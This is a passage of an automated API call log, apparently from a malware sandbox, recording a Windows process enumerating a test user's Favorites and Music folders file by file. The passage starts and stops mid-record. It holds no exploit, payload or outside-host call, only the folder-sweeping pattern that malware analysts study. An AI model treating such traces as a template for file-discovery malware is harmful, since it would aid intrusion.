(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0228.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0228.806] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.806] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.806] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.806] PathFindFileNameW (pszPath="") returned="" [0228.806] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba38 | out: hHeap=0x620000) returned 1 [0228.807] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.807] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.807] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0228.807] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0228.807] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0228.807] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7baa0 | out: hHeap=0x620000) returned 1 [0228.807] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0228.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0228.807] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.807] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.807] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.807] PathFindFileNameW (pszPath="") returned="" [0228.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a000 | out: hHeap=0x620000) returned 1 [0228.809] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.809] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0228.809] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0228.809] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0228.809] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0228.809] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0228.809] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0228.809] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.810] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.810] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0228.810] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0228.810] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.810] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.810] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.810] PathFindFileNameW (pszPath="") returned="" [0228.811] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0228.812] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0228.812] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.813] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.813] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0228.813] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0228.813] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.813] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.813] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.813] PathFindFileNameW (pszPath="") returned="" [0228.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.815] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.815] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0228.815] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0228.815] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0228.815] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0228.815] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0228.815] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.816] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.816] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\") returned="ZmlmXoAngk\\" [0228.816] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0228.816] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.816] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.816] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.816] PathFindFileNameW (pszPath="") returned="" [0228.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe28078d0, ftCreationTime.dwHighDateTime=0x1d5bbb6, ftLastAccessTime.dwLowDateTime=0xb4184e80, ftLastAccessTime.dwHighDateTime=0x1d5bdc0, ftLastWriteTime.dwLowDateTime=0xb4184e80, ftLastWriteTime.dwHighDateTime=0x1d5bdc0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe28078d0, ftCreationTime.dwHighDateTime=0x1d5bbb6, ftLastAccessTime.dwLowDateTime=0xb4184e80, ftLastAccessTime.dwHighDateTime=0x1d5bdc0, ftLastWriteTime.dwLowDateTime=0xb4184e80, ftLastWriteTime.dwHighDateTime=0x1d5bdc0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28745c0, ftCreationTime.dwHighDateTime=0x1d5c01a, ftLastAccessTime.dwLowDateTime=0x4f116840, ftLastAccessTime.dwHighDateTime=0x1d5b6be, ftLastWriteTime.dwLowDateTime=0x4f116840, ftLastWriteTime.dwHighDateTime=0x1d5b6be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="--nHV1eb", cAlternateFileName="")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bd55c10, ftCreationTime.dwHighDateTime=0x1d5c492, ftLastAccessTime.dwLowDateTime=0xc29c7520, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0xc29c7520, ftLastWriteTime.dwHighDateTime=0x1d5b75e, nFileSizeHigh=0x0, nFileSizeLow=0xdc17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c12gAGx_DbiDVGgC47j.wav", cAlternateFileName="C12GAG~1.WAV")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc57eda0, ftCreationTime.dwHighDateTime=0x1d5c11d, ftLastAccessTime.dwLowDateTime=0x2e6254a0, ftLastAccessTime.dwHighDateTime=0x1d5c015, ftLastWriteTime.dwLowDateTime=0x2e6254a0, ftLastWriteTime.dwHighDateTime=0x1d5c015, nFileSizeHigh=0x0, nFileSizeLow=0x918a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DjK6Z9TVms11M9cA8w.m4a", cAlternateFileName="DJK6Z9~1.M4A")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5f825f0, ftCreationTime.dwHighDateTime=0x1d5bfcc, ftLastAccessTime.dwLowDateTime=0x4ea014d0, ftLastAccessTime.dwHighDateTime=0x1d5c4e0, ftLastWriteTime.dwLowDateTime=0x4ea014d0, ftLastWriteTime.dwHighDateTime=0x1d5c4e0, nFileSizeHigh=0x0, nFileSizeLow=0x125d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fHTJAvELPoS-vEpQO.wav", cAlternateFileName="FHTJAV~1.WAV")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66790090, ftCreationTime.dwHighDateTime=0x1d5bd5a, ftLastAccessTime.dwLowDateTime=0x2568c610, ftLastAccessTime.dwHighDateTime=0x1d5c432, ftLastWriteTime.dwLowDateTime=0x2568c610, ftLastWriteTime.dwHighDateTime=0x1d5c432, nFileSizeHigh=0x0, nFileSizeLow=0x102bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mdTm586GgYHzCN.mp3", 